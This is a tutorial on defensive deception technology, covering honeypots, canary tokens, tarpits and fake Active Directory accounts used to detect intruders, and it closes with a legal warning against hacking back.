Defenders have to be right 100% of the time. Attackers only have to be right once. This asymmetry is unfair. Deception Technology flips the script. By planting fake servers, fake users, and fake files, we force the attacker to be right 100% of the time. If they touch ONE fake asset, they reveal themselves.
The Perfect Alarm
IDS/IPS generate thousands of false positives. A Honey Pot generates ZERO false positives. No legitimate user should ever try to log into SQL-Backups-2022. If someone does, it is an incident. Immediate Investigation.
1. Honey Pots: The Fake Server
A computer system sacrificed to lure hackers. We want them to attack it so we can study their behavior (Intelligence) or distract them from real assets (Defense).
1.1. Low Interaction (Cowrie)
This is a script that emulates a service. Cowrie is a famous SSH honeypot. It pretends to be a Linux server. It allows the hacker to login with `root/123456`.
It logs everything they type, but they aren't on a real system. The "file system" is fake.
1.2. High Interaction
This is a real, vulnerable Windows Server 2012 running in a heavily monitored VM.
Risk: If the hacker is skilled, they might escape the VM or use it to launch DDoS attacks. High risk, high reward (you capture zero-days).
2. Honey Tokens: The Fake Data
Setting up fake servers is hard. Setting up fake data is easy. These are called Canary Tokens.
2.1. The AWS Key Trap
Create an AWS IAM User. Give it ZERO permissions. Generate an Access Key ID and Secret Key.
Place these keys in a file called `aws_credentials.txt` on your developers' laptops.
Configure CloudTrail to alert you via PagerDuty the millisecond anyone tries to use that key.
If a developer's laptop is compromised, the hacker WILL steal that file and try to use it. You catch them instantly.
2.2. The DNS Token
Canarytokens.org allows you to generate a special DNS hostname (e.g., `x83d.canarytokens.com`).
Embed this into a Word Document, a PDF, or even a SQL database trigger.
When the file is opened, it tries to resolve the domain. The DNS server records the IP address of the resolver.
Use Case: Put a file named "Employee_Salaries.docx" on a file share. If it is opened, you know who (IP) is snooping.
3. Active Defense Strategy
Deception is about slowing the adversary down.
3.1. The Tarpit
A Tarpit (like LaBrea) answers connection requests on unused IP addresses. It completes the TCP handshake but sets the "Window Size" to zero or answers incredibly slowly (1 byte per minute).
This traps the attacker's scanning tools/threads, wasting their time and resources.
3.2. Fake Active Directory Accounts
Create a Domain Admin account named `aadministrator`. Give it a complex password that is actually impossible (100 chars).
Publish the hash of this password in memory (HoneyHash).
If an attacker uses Mimikatz to dump memory, they see this "juicy" admin hash. They try to Pass-the-Hash.
Your Domain Controller sees a login attempt for `aadministrator`. Boom. Detection.
4. Implementing CanaryTokens (Hands On)
You can self-host your own Canary Console (Opencanary).
Legal Warning
Do NOT Hack Back.
It is illegal to counter-attack the hacker's IP (it might be a proxied innocent grandma's PC).
Deception is legal because it happens on YOUR network. You are allowed to lie to intruders in your own house.